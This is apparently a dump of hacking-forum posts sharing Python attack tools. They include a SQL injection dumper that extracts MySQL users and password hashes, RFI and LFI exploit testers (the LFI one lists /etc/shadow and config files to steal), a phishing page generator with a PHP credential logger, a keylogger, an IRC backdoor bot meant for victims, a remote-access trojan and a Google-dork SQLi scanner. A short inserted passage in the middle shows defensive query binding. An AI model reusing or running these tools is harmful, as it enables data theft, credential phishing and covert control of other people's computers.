    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] Values Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        c1 = re.findall("K0BRA(.*?)K0BRA",code2)
        c1 = c1[0]

        c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
        c2 = c2[0]
        print "["+col1+"] : "+c1
        print "["+col2+"] : "+c2+"\n"
        savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
        savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
    else:
      print "[-] Not Found\n"



    def mysqluser(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    print "\n\n[+] Searching mysql.user\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] mysql.user : ON"
      savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
      savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
      print "[+] Users Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        host = re.findall("K0BRA(.*?)K0BRA",code2)
        host = host[0]

        user = re.findall("K0BRA1(.*?)K0BRA1",code2)
        user = user[0]

        passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
        passw = passw[0]
        savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
        savefile("logs/"+gethost(web)+".txt","[User] : "+user)
        savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
        print "[Host] : "+host
        print "[User] : "+user
        print "[Pass] : "+passw+"\n"   
    else:
      print "[-] Not Found\n"



    def showcolumnsdb(web,db,table,passx):
    db = "0x"+str(binascii.hexlify(db))
    table = "0x"+str(binascii.hexlify(table))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching columns in DB\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
      savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
      print "[+] information_schema : ON"
      print "[+] Columns Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        column = re.findall("K0BRA(.*?)K0BRA",code2)
        column = column[0]
        savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
        print "[Column Found] : "+column

    else:
      print "[-] Not Found\n"


    def showtablesdb(web,db,passx):
    db = "0x"+str(binascii.hexlify(db))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching tables in DB\n\n"
    savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
        numbers = re.findall("K0BRA(.*?)K0BRA",code1)
        numbers = numbers[0]
        print "[+] information_schema : ON"
        print "[+] Tables Found : ",numbers,"\n"
        for counter in range(0,int(numbers)):
            code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)

            if (re.findall("K0BRA(.*?)K0BRA",code2)):
                table = re.findall("K0BRA(.*?)K0BRA",code2)
                table = table[0]
                print "[Table Found] : "+table
                savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
        print "[-] Not Found\n"



def showtables(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    print "\n\n[+] Searching tables\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
        numbers = re.findall("K0BRA(.*?)K0BRA",code1)
        numbers = numbers[0]
        print "[+] information_schema : ON"
        print "[+] Tables Found : ",numbers,"\n"
        for counter in range(17,int(numbers)):
            code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
            if (re.findall("K0BRA(.*?)K0BRA",code2)):
                table = re.findall("K0BRA(.*?)K0BRA",code2)
                table = table[0]
                print "[Table Found] : "+table
                savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
        print "[-] Not Found\n"



def showcolumns(tabla,web,passx):
    pass1,pass2 = bypass(passx)
    tabla = "0x"+str(binascii.hexlify(tabla))
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
    print "\n\n[+] Searching tables\n\n"
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
        numbers = re.findall("K0BRA(.*?)K0BRA",code1)
        numbers = numbers[0]
        print "[+] information_schema : ON"
        print "[+] Columns Found : ",numbers,"\n"
        for counter in range(0,int(numbers)):
            code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
            if (re.findall("K0BRA(.*?)K0BRA",code2)):
                column = re.findall("K0BRA(.*?)K0BRA",code2)
                column = column[0]
                print "[Column Found] : "+column
                savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    else:
        print "[-] Not Found\n"




def showdbs(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
    print "\n\n[+] Searching DBS\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
        numbers = re.findall("K0BRA(.*?)K0BRA",code1)
        numbers = numbers[0]
        print "[+] information_schema : ON"
        print "[+] DBS Found : ",numbers,"\n"
        for counter in range(0,int(numbers)):
            code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
            if (re.findall("K0BRA(.*?)K0BRA",code2)):
                db = re.findall("K0BRA(.*?)K0BRA",code2)
                db = db[0]
                print "[DB Found] : "+db
                savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
    else:
        print "[-] Not Found\n"




def menu(page,bypass):
    clean()
    header()
    print "\n[+] Target : ",page,"\n"
    print "\n[information_schema]\n\n"
    print "1 - Show tables\n"
    print "2 - Show columns of the a table\n"
    print "3 - Show databases\n"
    print "4 - Show tables from the a DB\n"
    print "5 - Show columns from the a table of the DB\n"
    print "\n[mysql.user]\n\n"
    print "6 - Show users\n"
    print "\n[Others]\n\n"
    print "7 - Show details\n"
    print "8 - Dump data\n"
    print "9 - Show log\n"
    print "10 - Change target\n"
    print "11 - Exit\n\n"
    try:
        op = input("[Option] : ")
        if op == 1:
            showtables(page,bypass)
            raw_input()
            menu(page,bypass)
        elif op == 2:
            table = raw_input("\n\n[Table] : ")
            showcolumns(table,page,bypass)
            raw_input()
            menu(page,bypass)
        elif op == 3:
            showdbs(page,bypass)
            raw_input()
            menu(page,bypass)
        elif op == 4:
            db = raw_input("\n\n[DB] : ")
            showtablesdb(page,db,bypass)
            raw_input()
            menu(page,bypass)
        elif op == 5:
            db = raw_input("\n\n[DB] : ")
            table = raw_input("\n\n[Table] : ")
            showcolumnsdb(page,db,table,bypass)
            raw_input()
            menu(page,bypass)
        elif op == 6:
            mysqluser(page,bypass)
            raw_input()
            menu(page,bypass)
        elif op == 7:
            more(page,bypass)
            raw_input()
            menu(page,bypass)
        elif op == 8:
            table = raw_input("\n\n[Table] : ")
            col1 = raw_input("\n\n[Column 1] : ")
            col2 = raw_input("\n\n[Column 2] : ")
            dumper(page,bypass,table,col1,col2)
            raw_input()
            menu(page,bypass)
        elif op == 9:
            os.system("start logs/"+gethost(page)+".txt")
            menu(page,bypass)
        elif op == 10:
            sta()
    except:
        menu(page,bypass)
    if op == 11:
        copyright()


def more(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Searching more data\n"
    web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
    code0 = toma(web1+pass2)
    if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
        datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
        datar = re.split("K0BRA",datax[0])
        print "[+] Username :",datar[1]
        print "[+] Database :",datar[2]
        print "[+] Version :",datar[3],"\n"
        savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
        savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
        savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    if (re.findall("K0BRA",code1)):
        print "[+] mysql.user : on"
        savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
    code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    if (re.findall("K0BRA",code2)):
        print "[+] information_schema.tables : on"
        savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

def findlength(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
    for te in range(2,30):
        number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
        code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
        if (re.findall("K0BRA(.*?)K0BRA",code)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code)
            print "[+] Column length :",te
            print "[+] Numbers",numbers,"print data"
            sql = ""
            tex = te + 1
            for sqlix in range(2,tex):
                sql = str(sql)+","+str(sqlix)
                sqli  = str(1)+sql
            sqla = re.sub(numbers[0],"hackman",sqli)
            savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
            menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

    print "[-] Length dont found\n"


def scan(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n\n[+] Testing vulnerability"
    code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
        print "[+] SQLI Detected"
        findlength(web,passx)
    else:
        print "[-] Not Vulnerable"
        copyright()


def sta():

    clean()
    header()

    web = raw_input("\n\n[Page] : ")
    bypasx = raw_input("\n\n[Bypass] : ")
    scan(web,bypasx)

sta()

#The End
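The injection tool above only gets anywhere when two things hold on the server: the id parameter is spliced into the SQL text, and the database error ("The used SELECT statements have a different number of columns") is echoed back in the page. As an added example, not code from the original post, the following Python 3 snippet shows the two server-side controls that close both paths: strict input validation plus parameter binding, and error handling that logs the database detail instead of returning it. The `news` table is constructed in-memory sample data; `handle_request` stands in for a web handler and is an assumption of this example.

```python
import logging
import sqlite3

log = logging.getLogger("app")

def build_db():
    """Constructed sample data: an in-memory table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first post"), (2, "second post")])
    return conn

def parse_id(raw):
    """Validate before querying: the id parameter is a positive integer, nothing else."""
    if not raw.isdigit():
        raise ValueError("id must be a positive integer")
    return int(raw)

def bound_lookup(conn, raw):
    """Even with validation skipped, a bound parameter is compared as a value and
    never parsed as SQL, so 'union select' text simply matches no row."""
    row = conn.execute("SELECT title FROM news WHERE id = ?", (raw,)).fetchone()
    return row[0] if row else None

def handle_request(conn, raw_id):
    """What the HTTP layer returns: validation failure -> 400, database error -> 500
    with the detail logged server-side only, so the response never carries the
    column-count error text that the probe is waiting for."""
    try:
        row = conn.execute("SELECT title FROM news WHERE id = ?",
                           (parse_id(raw_id),)).fetchone()
    except ValueError:
        return 400, "bad request"
    except sqlite3.Error as exc:
        log.error("query failed: %s", exc)   # detail stays in the server log
        return 500, "internal error"
    if row is None:
        return 404, "not found"
    return 200, row[0]

if __name__ == "__main__":
    db = build_db()
    for probe in ("1", "99", "-1 union select 1--", "-1/**/union/**/select/**/1"):
        print(repr(probe), "->", handle_request(db, probe))
```

Both the plain probe and the `/**/` "bypass" variant the tool accepts as an argument are rejected before any SQL is built; `bound_lookup` shows that binding alone already neutralises them, so validation is defence in depth rather than the only barrier.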
#372
Python / [Python] RFI Tester
July 03, 2011, 09:36:38 PM
Hello everyone.

I just made a simple RFI vulnerability checker

Code: python

#!/usr/bin/python
#RFI Tester (C) Doddy Hackman

import os,sys,urllib2,re

def header() :
    print "\n--== RFI Tester ==--\n"

def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    exit(1)

def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
    return urllib2.urlopen(web).read()

def test(web):
    try:
        print "\n[+] Testing vulnerability RFI in",web
        code = toma(web+"http://www.supertangas.com")
        if(re.findall("Los mejores TANGAS de la red",code,re.I)):
            print "[+] RFI Detected"
        else:
            print "[-] RFI Not Found"
    except:
        pass

header()

if len(sys.argv) != 2 :
    show()

else :
    test(sys.argv[1])

copyright()


#The End


Usage example

Code: text

python rfi.py http://127.0.0.1/rfi.php?index=


Code: text

C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010

#373
Python / [Python] Phising Gen By Doddy H
July 03, 2011, 09:36:25 PM
Hello everyone

I just finished this tool in Python to generate fakes, or phishing pages (if that's how it's spelled).
I don't do much of that side of hacking, but I made this weird thing because I
had nothing to do xDD.

Code: python

#!usr/bin/python
#Phising Gen (C) Doddy Hackman

import urllib2,sys,os


def savefile(filename,text):
file = open(filename,"w")
file.write(text)
   

def header() :
print "\n\n--== Phising Gen ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def gen(web,new):
try:
  print "\n[+] Working in the phishing"
  code = toma(web)
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  print "[+] The fake was save in",new
  savefile(new,code+"\n\n"+text)
except:
  pass

header()

if len(sys.argv) != 3 :
show()

else :
gen(sys.argv[1],sys.argv[2])

copyright()

#The End






Usage example

Code: text

C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010



#374
Python / [Python] LFI T00l
July 03, 2011, 09:36:14 PM
Hello everyone.

I just finished a tool to test for an LFI vulnerability; if the page
is vulnerable, the script automatically tries to brute-force files.

Code: python

#!/usr/bin/python
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']

def header() :
    print "\n--== LFI T00l ==--\n"

def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    exit(1)

def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
    return urllib2.urlopen(web).read()


def fuzz(web):
    print "\n[+] Fuzzing files...\n"
    for file in files:
        code = toma(web+file)
        if not (re.findall("No such file or directory in",code)):
            print "[File Found] : ",web,file



def test(web):
    try:
        print "\n[+] Testing vulnerability LFI in",web
        code = toma(web+"'")
        if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
            fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
            print "\n[+] LFI Detected"
            print "[+] Full Path discloure : ",fpd[0]
            fuzz(web)
        else:
            print "[-] LFI Not Found"
    except:
        pass

header()

if len(sys.argv) != 2 :
    show()

else :
    test(sys.argv[1])

copyright()


#The End


Usage example

Code: text

python lfi.py http://127.0.0.1/lfi.php?file=


Code: text

C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010

#375
Python / [Python] Simple Keylogger
July 03, 2011, 09:36:01 PM
A simple keylogger in Python

Code: python

#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011

import pyHook,pythoncom


def savefile(name,text):
file = open(name,"a")
file.write(text+"\n")
file.close()

def toma(frase):
savefile("logs.txt",frase.Key)

def capturar():
nave = pyHook.HookManager()
nave.KeyDown = toma
nave.HookKeyboard()
pythoncom.PumpMessages()

while 1:
capturar()

# The End
#376
Python / [Python] IRC Bot
July 03, 2011, 09:35:50 PM
Hello everyone.

Here I bring you an IRC bot in Python to use as a hidden server and send it
to a victim in order to control them from an IRC channel

The key command for sending commands, whose output is then shown
in the chat, is

Code: python

cmdnow TUCOMANDO


Code: python

#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001

import re,socket
import subprocess

host = "127.0.0.1"
canal = "#locos"
nick = "bot"

irc = socket.socket()
try:
irc.connect((host,6667))
irc.send("NICK "+nick+"\r\n")
irc.send("USER "+nick+" 1 1 1 1\r\n")
irc.send("JOIN "+canal+"\r\n")
print "[+] Insane Bot Online\n"
while 1:
  code = irc.recv(9999)
  if re.findall("PING",code):
   irc.send("PONG "+code.split()[1]+"\r\n")
  if re.findall("PRIVMSG",code):
   nick = code.split("!")
   nick = nick[0].replace(":","")
   msg = code.split(":")[2:][0]
   if re.findall("cmdnow",code):
    cmd = code.split("cmdnow")[1]
    irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
    rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    if rea:
     re1 = rea.stdout.read()
     total = re1.replace("\n","|")
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
    else:
     re2 = rea.stderr.read()
     total = re2.replace("\n","|")
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
   
   
except:
print "\n\n[-] Error\n\n"


# The End
#377
Python / [Python] HTTP Console By Doddy H
July 03, 2011, 09:35:32 PM
Well, this is a simple Python program made with Tk that lets you send
web requests to a specific server

Code: python

#!/usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import socket

def execa() :
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((str(host.get()),80))
    s.send(cmd.get()+"\r\n")
    data = s.recv(666)
    s.close()
    panel.insert(END,repr(data))



window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")

window.configure(background="black")
window.configure(cursor="tcross")

host = StringVar()
cmd = StringVar()

panel = Text(window,width=30,height=15,bg="black",fg="red")

Label(window,bg="black").grid(row=3)

Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)

Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)

Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)


Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)


window.mainloop()


#378
Python / [Python] HellRat By Doddy H
July 03, 2011, 09:35:15 PM
Hi, here I bring a trojan in Python with the following
options

  • Hide Start
  • Show Start
  • Hide taskbar
  • Show taskbar
  • Open CD
  • Close CD
  • Run commands
  • Show information

server.py

Code: python

    #!usr/bin/python
    #Hell RAt (C) Doddy Hackman 2011

    import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess

    print "\n\n[+] Online\n\n"

    slave = socket.socket()
    slave.bind(("",666))
    slave.listen(999)

    a,b = slave.accept()

    while True:
    rex = a.recv(20)
    if re.findall("getso",rex):
      z = os.name
      a.send(z)
    if re.findall("getpath",rex):
      h = os.getcwd()
      a.send(h)
    if re.findall("ocultarinicio",rex):
      x = win32gui.FindWindow("Shell_TrayWnd","")
      win32gui.ShowWindow(x,win32con.SW_HIDE)
    elif re.findall("mostrarinicio",rex):
      x = win32gui.FindWindow("Shell_TrayWnd","")
      win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
    elif re.findall("ocultaricono",rex):
      x = win32gui.FindWindow(0,"Program Manager")
      win32gui.ShowWindow(x,win32con.SW_HIDE)
    elif re.findall("mostraricono",rex):
      x = win32gui.FindWindow(0,"Program Manager")
      win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
    elif re.findall("abrircd",rex):
      ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
    elif re.findall("cerrarcd",rex):
      ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
    else:
      rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
      if re:
       a.send(rea.stdout.read())
      else:
       a.send(rea.stderr.read())


    # The End   


cliente.py

Code: python

    #!usr/bin/python
    #HellRat (C) Doddy Hackman 2011

    import os,socket,sys

    def head():
    print "\n\n-- == hELLrAT == --\n\n"

    def copyright():
    print "\n\n(C) Doddy Hackman 2011\n\n"

    def clean():
    if sys.platform=="win32":
      os.system("cls")
    else:
      os.system("clear")

    def men():

    try:
      ip = raw_input("[+] IP : ")
      client = socket.socket()
      client.connect((ip,666))
      while True:
       clean()
       print "\n\n[+] Welcome to ",ip,"\n\n"
       print "\n\n[1] Informacion"
       print "[2] CMD"
       print "[3] Abrir CD"
       print "[4] Cerrar CD"
       print "[5] Ocultar iconos"
       print "[6] Mostrar iconos"
       print "[7] Ocultar barra de tareas"
       print "[8] Mostrar barra de tareas"
       print "[9] Cambiar IP"
       print "[10] Salir"
       op = input("\n\n[Opcion] : ")
       if op == 1:
        print "\n\n[+] Informacion\n\n"
        client.send("getso")
        so = client.recv(999)
        client.send("getpath")
        path = client.recv(999)
        print "[+] SO : "+so 
        print "[+] Path : "+path
        raw_input()
       if op == 2:
        cmd = raw_input("\n[CMD] : ")
        client.send(cmd)
        code = client.recv(999)
        print code
        raw_input()
       if op == 3:
        client.send("abrircd")
       if op == 4:
        client.send("cerrarcd")
       if op == 5:
        client.send("ocultaricono")
       if op == 6:
        client.send("mostraricono")
       if op == 7:
        client.send("ocultarinicio")
       if op == 8:
        client.send("mostrarinicio")
       if op == 9:
        men()
       if op == 10:
        client.close()
        copyright()
        raw_input()
        sys.exit(1)
    except:
      print "\n\n[-] Error\n\n"
    head()
    men()

    # The End

#379
Python / [Python] Google Inyector By dODDY h
July 03, 2011, 09:34:58 PM
Well, I just made an SQLi scanner.

It searches Google for pages using a dork you specify,
then removes duplicates and scans the sites found


Code: python

#!/usr/bin/python
#Google Iny (C) Doddy Hackman 2011


import urllib2,re,os,sys


def head():
    print "\n\n -- == Google Iny == --\n"

def copyright():
    print "\n(C) Doddy Hackman 2011\n"
    sys.exit(1)


def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')
    op = urllib2.build_opener()
    return op.open(nave).read()


def show():
    print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"

def limpiar(pag):

    limpia = []
    for p in pag:
        if not (re.findall("http://www.google.com.ar",p,re.I)):
            if p not in limpia:
                limpia.append(p)
    return limpia


def sql(webs):
    for web in webs :
        if re.findall("=",web):
            web = re.split("=",web)
            web = web[0]+"="
            try:
                code = toma(web+"-1+union+select+1--")
                if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
                    print "[SQLI] : ",web,"\n"
            except:
                pass

def scan(dork,count):
    pag = []
    s = 10
    while s <= int(count):
        try:
            code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
            d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
            s += 10
            for a in d:
                pag.append(a)
        except:
            copyright()
    pag = limpiar(pag)

    return pag

head()

if len(sys.argv) != 3:
    show()
else :
    print "\n[+] SQL Scan Started\n"
    print "[+] Dork : ",sys.argv[1]
    print "[+] Count : ",sys.argv[2]
    pages = scan(sys.argv[1],sys.argv[2])
